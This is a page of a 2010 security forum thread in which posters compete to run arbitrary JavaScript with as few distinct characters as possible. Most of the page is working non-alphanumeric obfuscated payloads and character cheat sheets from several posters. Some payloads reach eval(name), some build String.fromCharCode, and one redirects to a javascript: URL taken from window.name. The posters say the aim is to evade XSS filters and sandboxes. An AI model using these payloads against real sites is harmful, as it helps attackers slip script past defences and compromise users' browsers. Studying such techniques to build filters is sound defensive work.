Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous123Next
Current Page: 2 of 3
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: Anonymous User
Date: January 15, 2010 10:13PM

It's not over yet :) More later...

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: sirdarckcat
Date: January 15, 2010 11:10PM



--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: Gareth Heyes
Date: January 16, 2010 01:34PM

6 is the wall I doubt it can be beaten

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: sirdarckcat
Date: January 16, 2010 07:30PM

haha David and I reached the same conclusion, unless he is talking about another browser.. (maybe chrome?) but who knows..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: Anonymous User
Date: January 19, 2010 08:22AM

I am close to giving up on 5 - although all that is needed is an s made out of []/_+ and we'd be there ;)

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: Gareth Heyes
Date: January 19, 2010 09:37AM

haha the great js wall has you beat. I don't think it can be done. What chars can you currently get?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: Anonymous User
Date: January 19, 2010 09:46AM

NaN, Infinity, any digit, undefined etc.. I was trying to get an s to get hands on isNaN() to get the rest of the necessary characters - to then access []['__parent__']['location'] - so the s is actually the last character from stopping us to get it running with 5 :P Or an r+l - to access [].filter again...

Anyway haha - 6 seems to be it :)



Edited 1 time(s). Last edit at 01/19/2010 09:50AM by .mario.

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: Gareth Heyes
Date: January 19, 2010 09:50AM

Hmmmmmmmm lets say you had a "s" or "r" how would you do an assignment or function call with () or =

?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: Anonymous User
Date: January 19, 2010 10:00AM

Yep that's right - almost no way :) Bloody underscore!

Options: ReplyQuote
Re: Yet Another Useless Contest (but fun!) Less chars needed to run arbitrary JS code
Posted by: sirdarckcat
Date: January 19, 2010 08:24PM

the JS GREAT WALL!! 6 is a perfect number as david mentioned, so.. it's perfect!

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: LeverOne
Date: February 05, 2010 11:18AM

6 chars: []()+!
Length: 2130 chars

Full PoC: http://pastebin.com/f5d8bc217

Code execution: []['filter']['constructor']('eval(name)')()

Cheat sheet:

true: !+[]
false: ![]
undefined: [][[]]
0: +[]
1: +!+[]
2: !+[]+!+[]
10: +!+[]+[+[]]
f: "false"[0] (![]+[])[+[]]
i: "falseundefined"[10] ([![]]+[][[]])[+!+[]+[+[]]]
l: "false"[2] (![]+[])[!+[]+!+[]]
t: "true"[0] (!+[]+[])[+[]]
e: "true"[3] (!+[]+[])[!+[]+!+[]+!+[]]
r: "true"[1] (!+[]+[])[+!+[]]
c: "function"[3] ([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]
o: "truefunction"[10] (!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]
n: "undefined"[1] ([][[]]+[])[+!+[]]
s: "false"[3] (![]+[])[!+[]+!+[]+!+[]]
u: "undefined[0] ([][[]]+[])[+[]]
v: "0function filter() {.....[native"[30] (+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[!+[]+!+[]+!+[]+[+[]]]
a: "false"[1] (![]+[])[+!+[]]
m: ((+[])['constructor']+[])[11] ((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!+[]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]
(: (![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[!+[]+!+[]+[+[]]]
): (!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[!+[]+!+[]+[+[]]]

LeverOne



Edited 2 time(s). Last edit at 02/05/2010 05:18PM by LeverOne.

Options: ReplyQuote
Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: doody
Date: February 06, 2010 02:52AM

Could someone explain what's going on here? I'm kinda lost...

Options: ReplyQuote
Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: sirdarckcat
Date: February 06, 2010 02:59AM

We are trying to find the smallest subset of characters needed to run arbitrary JS code.

As far as we know, there are different 6 chars subsets, so now we are trying to find the one that requires less characters.

LeverOne is awesome haha he is already winning our diminutive contest.

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 2 time(s). Last edit at 02/06/2010 03:00AM by sirdarckcat.

Options: ReplyQuote
Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: doody
Date: February 06, 2010 11:30AM

I looked at his PoC. Am I right in saying that it's basically doing eval(name)? So how come we need []['filter']['constructor']('eval(name)')()?

Also, is there any practical use in this? Or is it just a fun contest? =P

Options: ReplyQuote
Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: sirdarckcat
Date: February 06, 2010 06:41PM

eval(name) uses 8 chars:

ealmnv()

this other one uses 6 chars:

[]()+!

this are useful for evasion and obfuscation of xss filters.. as well as.. fun!

the non-alnum contest actually was capable of bypassing FBJS sandbox.. and this contest started from a real life requirement for the exploitation of a bug.. so yeah, it's useful AND fun!

Greetings!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 02/06/2010 07:41PM by sirdarckcat.

Options: ReplyQuote
Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: doody
Date: February 07, 2010 04:15AM

Ok, I read one of the posts in the previous thread so I'm beginning to understand how the strings are constructed. Gee how does anyone figure out that ![] gives you false?

I can't seem to get undefined printed when i do javascript:[][[]], am I missing something? Also is there a reason why we're doing eval(name)? Wouldn't something like eval(a) save some chars? Also, don't really understand why we have to do []['filter']['constructor']('eval(name)')() just to get to the eval function.

Hah, now I feel noob-ish.

Options: ReplyQuote
Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: sirdarckcat
Date: February 07, 2010 05:45AM

javascript:[][[]]+[]
should get u undefined..

and name is referring to window.name, check the other threads in this board to understand why we do it that way

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: doody
Date: February 08, 2010 07:41PM

Yep, understood the window.name part. I think this section is a bit above me right now...

Options: ReplyQuote
Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: SW
Date: February 09, 2010 01:40AM

Hi guys.

I've spent a few hours on this now, and I don't think it's possible to ditch the ! or == operators unless we find some obscure place to get letters. P.S. there should probably be a thread, "where to get letters with javascript". I think you could get them all by going into window.document and getting stuff, which would be EXTREMELY LONG, I wonder if there are any places we're missing.



Edited 1 time(s). Last edit at 02/09/2010 01:41AM by SW.

Options: ReplyQuote
Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: SW
Date: February 09, 2010 04:42AM

>>> We are trying to find the smallest subset of characters needed to run arbitrary JS code.

This might not be exactly on topic of eval(name) or whatever the original idea was, but I have String.fromCharCode() in ~3900 characters. Now we can run truly arbitrary code, since we have all the letters. With another 2100 to call it, that would be 6000 characters baseline, after which you can input an arbitrary string at [relatively] cheap cost (something like 10-20 more per letter). Think it's still practically useful? :D

I won't repeat the part that LeverOne posted (though I think my 'm' might be a bit shorter), but here it is.

String.fromCharCode():
((![]+[])[+[]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[(![]+[])[+[]]+(!![]+[])[+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(((([],[][(![]+[])[+!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]])))()[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+((([],[][(![]+[])[+!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]]))()+[])[+!+[]+!+[]]])(([][[]]+[])[+!+[]+!+[]]+(+!+[]+!+[]+[+!+[]]))[+!+[]]+(((([],[][(![]+[])[+!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]])))()[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+((([],[][(![]+[])[+!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]]))()+[])[+!+[]+!+[]]])(([][[]]+[])[+!+[]+!+[]]+(+[])+([][[]]+[][[]]+[])[+[]])[+!+[]]+(((([],[][(![]+[])[+!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]])))()[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+((([],[][(![]+[])[+!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]]))()+[])[+!+[]+!+[]]])((![]+[])[+!+[]]+([][[]]+[][[]]+[])[+[]])[+[]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+(((([],[][(![]+[])[+!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]])))()[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+((([],[][(![]+[])[+!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]]))()+[])[+!+[]+!+[]]])(([][[]]+[])[+!+[]+!+[]]+(+[])+([][[]]+[][[]]+[])[+[]])[+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]+!+[]]+([][[]]+[])[+!+[]+!+[]+!+[]]]

I don't know much about Hackvertor, is there any way to convert a string into no alnum char codes with it?

Each 'm', 'h', 'C' cost ~680 characters but I am now certain that you can create every letter or character if you have enough space, by using atob, but it's surprisingly nasty to access that function (not to mention making reverse encodings!). You have to access Window twice, once to get 'b', and then for the call.

PS - Thanks to this thread I will forever have the image [+[]] burned into my memory when I think of 0.



Edited 4 time(s). Last edit at 02/09/2010 05:11AM by SW.

Options: ReplyQuote
Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: Gareth Heyes
Date: February 09, 2010 05:16AM

Quote

SW Wrote:
> I don't know much about Hackvertor, is there any
> way to convert a string into no alnum char codes
> with it?

Yeah it's possible but in the old style:-
http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php#PEBoYXNlZ2F3YV8wKCKqwMHCw8TGyMnKy8zNzs%2FQ0dLT1NXW2Nna29zd3t%2Fg4eLj5OXm5%2Bjp6uvs7e7v8PHy8%2FT19vj5%2Bvv8%2Ff4kXyIpPmFsZXJ0KDEpPEAvaGFzZWdhd2FfMD4%3D

I plan to add non-alpha string generators and non-alpha encode/decode in future though. Maybe in the next version

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: sirdarckcat
Date: February 09, 2010 09:54AM

@SW, yeah.. the reason we concluded 6 is the JS Great Wall is because:
Unvariable: []+

And then we have two options:

Execution via function call: ()
we need truefalse, total = 6

Execution via assignment: =
we need a reference to window, or /_, total = 6


if we find a way to get property method using undefinedInfinity then we break the wall.
if we find a way to get a reference to window with only: []+= and any other char, then we break the wall.


but since we failed to do that, then that's why we called it JS Great Wall..

Greetings!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: LeverOne
Date: February 09, 2010 11:13PM

6 chars: _/=+[] (optimal set)
Length: 503 chars

Code execution: []['__parent__']['location']=[]['__parent__']['name']

PoC:

name='javascript:alert(1)';

[___=[[_=[]]==_]+_[_]][______=[______=/__/[___[++_+_+_]+[_____=[____=[__=[_==_]+_[_]][___[+[]]+___[_+[+[]]]+___[++_]+__[+[]]+__[++_]+__[_/_]]+_][+[]][_+_]]+__[_+_/_]+__[_/_]+[____=____[_]]+__[_]]]+[/_/[_______=____+_____+___[_+_]+___[_]+__[+[]]+__[_/_]+__[++_]+____+__[+[]]+_____+__[_/_]]+_][+[]][_/_+[_]]+___[_=_/_]+__[_++]+__[++_]+___[_+_]+__[+[]]+______][___[_/_+_/_]+_____+____+___[_/_]+__[+[]]+___[_/_+[+[]]]+_____+___[_+_]]=[][______][___[_+_]+___[_/_]+[[_][+[]][_______]+_][+[]][_/_+[_/_]]+__[_]]

Cheat sheet:

NaN +/_/
false: []==[]
true: +[]==[]
undefined: [][[]]

_: numeric
__: "trueundefined"
___: "falseundefined"
____: filter, c
_____: o
______: __, __parent__
_______: constructor

init1: ___=[[_=[]]==_]+_[_]
init2: __=[_==_]+_[_]
s: "falseundefined"[3] ___[++_+_+_]
f: "falseundefined"[0] ___[+[]]
i: "falseundefined"[10] ___[_+[+[]]]
l: "falseundefined"[2] ___[++_]
t: "trueundefined"[0] __[+[]]
e: "trueundefined"[3] __[++_]
r: "trueundefined"[1] __[_/_]
o: "function"[6] _____=[____=[]['filter']+_][+[]][_+_]
u: "trueundefined"[4] __[_+_/_]
r: "trueundefined"[1] __[_/_]
c: "function"[3] ____=____[_]
e: "trueundefined"[3] __[_]
c: "function"[3] ____
o: "function"[6] _____
n: "falseundefined"[6] ___[_+_]
s: "falseundefined"[3] ___[_]
t: "trueundefined"[0] __[+[]]
r: "trueundefined"[1] __[_/_]
u: "trueundefined"[4] __[++_]
c: "function"[3] ____
t: "trueundefined"[0] __[+[]]
o: "function"[6] _____
r: "trueundefined"[1] __[_/_]
p: "function RegExp"[14] [/_/['constructor']+_][+[]][_/_+[_]]
a: "falseundefined"[1] ___[_=_/_]
r: "trueundefined"[1] __[_++]
e: "trueundefined"[3] __[++_]
n: "falseundefined"[6] ___[_+_]
t: "trueundefined"[0] __[+[]]
l: "falseundefined"[2] ___[_/_+_/_]
o: "function"[6] _____
c: "function"[3] ____
a: "falseundefined"[1] ___[_/_]
t: "trueundefined"[0] __[+[]]
i: "falseundefined"[10] ___[_/_+[+[]]]
o: "function"[6] _____
n: "falseundefined"[6] ___[_+_]
n: "falseundefined"[6] ___[_+_]
a: "falseundefined"[1] ___[_/_]
m: "function Number"[11] [[_][+[]][_______]+_][+[]][_/_+[_/_]]
e: "trueundefined"[3] __[_]


LeverOne



Edited 3 time(s). Last edit at 02/25/2010 08:09AM by LeverOne.

Options: ReplyQuote
Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: SW
Date: February 10, 2010 01:24AM

Very very nice job! Intense...!



Edited 1 time(s). Last edit at 02/10/2010 01:32AM by SW.

Options: ReplyQuote
Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: sirdarckcat
Date: February 10, 2010 05:23AM

LeverOne you rock =) haha

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: thornmaker
Date: February 10, 2010 08:38AM

good stuff. i've been waiting for someone to start minimizing with variable assignments. 503 is awesome

Options: ReplyQuote
Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: LeverOne
Date: February 25, 2010 08:16AM

Length: 460 chars

PoC:
name='javascript:alert(1)';

[___=[[_=[]]==_]+_[__=/_/+_]][_____=[_____=__[++_]+__[_]]+[/_/[_______=[______=[____=[__=[_==_]+_[_]][___[+[]]+___[_+[+[]]]+___[++_]+__[+[]]+__[++_]+__[_/_]]+_][+[]][_]]+[____=____[_+_]]+___[_+_]+___[_]+__[+[]]+__[_/_]+__[++_]+______+__[+[]]+____+__[_/_]]+_][+[]][_/_+[_]]+___[_=_/_]+__[_++]+__[++_]+___[_+_]+__[_=+[]]+_____][___[++_+_]+____+______+___[_]+__[+[]]+___[_+[+[]]]+____+ ___[++_+_+_]]=[__=_[_______]+_][_____][__[_]+___[_/_]+__[_/_+[_/_]]+___[_+_]]

Cheat sheet:

_: numeric
__: "/_/", "trueundefined", "function Number"
___: "falseundefined"
____: "function", o
_____: __, __parent__
______: c
_______: constructor


init1: "falseundefined" ___=[[_=[]]==_]+_[_]

init2: "/_/" __=/_/+_ <-- change

init3: "trueundefined" __=[_==_]+_[_]

__: __[++_]+__[_]

f: "falseundefined"[0] ___[+[]]
i: "falseundefined"[10] ___[_+[+[]]]
l: "falseundefined"[2] ___[++_]
t: "trueundefined"[0] __[+[]]
e: "trueundefined"[3] __[++_]
r: "trueundefined"[1] __[_/_]

c: "function"[3] [[]['filter']+_][+[]][_]
o: "function"[6] ____[_+_]
n: "falseundefined"[6] ___[_+_]
s: "falseundefined"[3] ___[_]
t: "trueundefined"[0] __[+[]]
r: "trueundefined"[1] __[_/_]
u: "trueundefined"[4] __[++_]
c: "function"[3] ______
t: "trueundefined"[0] __[+[]]
o: "function"[6] ____
r: "trueundefined"[1] __[_/_]

p: "function RegExp"[14] [/_/['constructor']+_][+[]][_/_+[_]]
a: "falseundefined"[1] ___[_=_/_]
r: "trueundefined"[1] __[_++]
e: "trueundefined"[3] __[++_]
n: "falseundefined"[6] ___[_+_]
t: "trueundefined"[0] __[_=+[]]

l: "falseundefined"[2] ___[++_+_]
o: "function"[6] ____
c: "function"[3] ______
a: "falseundefined"[1] ___[_]
t: "trueundefined"[0] __[+[]]
i: "falseundefined"[10] ___[_+[+[]]]
o: "function"[6] ____
n: "falseundefined"[6] ___[++_+_+_]

init4: "function Number" __=_[_______]+_

n: "function Number"[2] __[_]
a: "falseundefined"[1] ___[_/_]
m: "function Number"[11] __[_/_+[_/_]]
e: "falseundefined"[4] ___[_+_]



Note! __parent__ property is obsolete in Gecko 1.9.3 and does not work on FF3.7a5 , FF4.0b1 : https://developer.mozilla.org/en/Core_JavaScript_1.5_Reference/Global_Objects/Object

#goodbye


LeverOne



Edited 4 time(s). Last edit at 07/13/2010 02:01PM by LeverOne.

Options: ReplyQuote
Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: Gareth Heyes
Date: July 13, 2010 10:53AM

=[]+

NaN:+[][+[]]

undefined:[][+[]]

false:[]==[]

true:+[]==+[]

f:[[[]==[]]+[]][+[]][+[]]

i:[[][+[]]+[]][+[]][++[++[++[++[++[[]][+[]]][+[]]][+[]]][+[]]][+[]]]

l:[[[]==[]]+[]][+[]][++[++[+[]][+[]]][+[]]]

t:[[+[]==+[]]+[]][+[]][+[]]

e:[[+[]==+[]]+[]][+[]][++[++[++[+[]][+[]]][+[]]][+[]]]

r:[[+[]==+[]]+[]][+[]][++[+[]][+[]]]

function filter(){[native code]}:[][[[[]==[]]+[]][+[]][+[]]+[[][+[]]+[]][+[]][++[++[++[++[++[[]][+[]]][+[]]][+[]]][+[]]][+[]]]+[[[]==[]]+[]][+[]][++[++[+[]][+[]]][+[]]]+[[+[]==+[]]+[]][+[]][+[]]+[[+[]==+[]]+[]][+[]][++[++[++[+[]][+[]]][+[]]][+[]]]+[[+[]==+[]]+[]][+[]][++[+[]][+[]]]]

o:[[][[[[]==[]]+[]][+[]][+[]]+[[][+[]]+[]][+[]][++[++[++[++[++[[]][+[]]][+[]]][+[]]][+[]]][+[]]]+[[[]==[]]+[]][+[]][++[++[+[]][+[]]][+[]]]+[[+[]==+[]]+[]][+[]][+[]]+[[+[]==+[]]+[]][+[]][++[++[++[+[]][+[]]][+[]]][+[]]]+[[+[]==+[]]+[]][+[]][++[+[]][+[]]]]+[]][+[]][++[++[++[++[++[++[+[]][+[]]][+[]]][+[]]][+[]]][+[]]][+[]]]

c:[[][[[[]==[]]+[]][+[]][+[]]+[[][+[]]+[]][+[]][++[++[++[++[++[[]][+[]]][+[]]][+[]]][+[]]][+[]]]+[[[]==[]]+[]][+[]][++[++[+[]][+[]]][+[]]]+[[+[]==+[]]+[]][+[]][+[]]+[[+[]==+[]]+[]][+[]][++[++[++[+[]][+[]]][+[]]][+[]]]+[[+[]==+[]]+[]][+[]][++[+[]][+[]]]]+[]][+[]][++[++[++[[]][+[]]][+[]]][+[]]]

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: YAUC Less chars needed to run arbitrary JS code = 6! (JS GREAT WALL)
Posted by: LeverOne
Date: July 14, 2010 04:36AM

Since the direction of the char "=" is now a dead end, optimal set is ()[]!+

The example uses this way for getting a reference to window : http://sla.ckers.org/forum/read.php?24,28641#msg-33323 and these letters http://sla.ckers.org/forum/read.php?24,32930,page=2#msg-33286.

POC: http://pastebin.com/eaVsamTH
Length: 1825


f: (![]+[])[+[]]
i: ([![]]+[][[]])[+!+[]+[+[]]]
l: (![]+[])[!+[]+!+[]]
t: (!+[]+[])[+[]]
e: (!+[]+[])[!+[]+!+[]+!+[]]
r: (!+[]+[])[+!+[]]

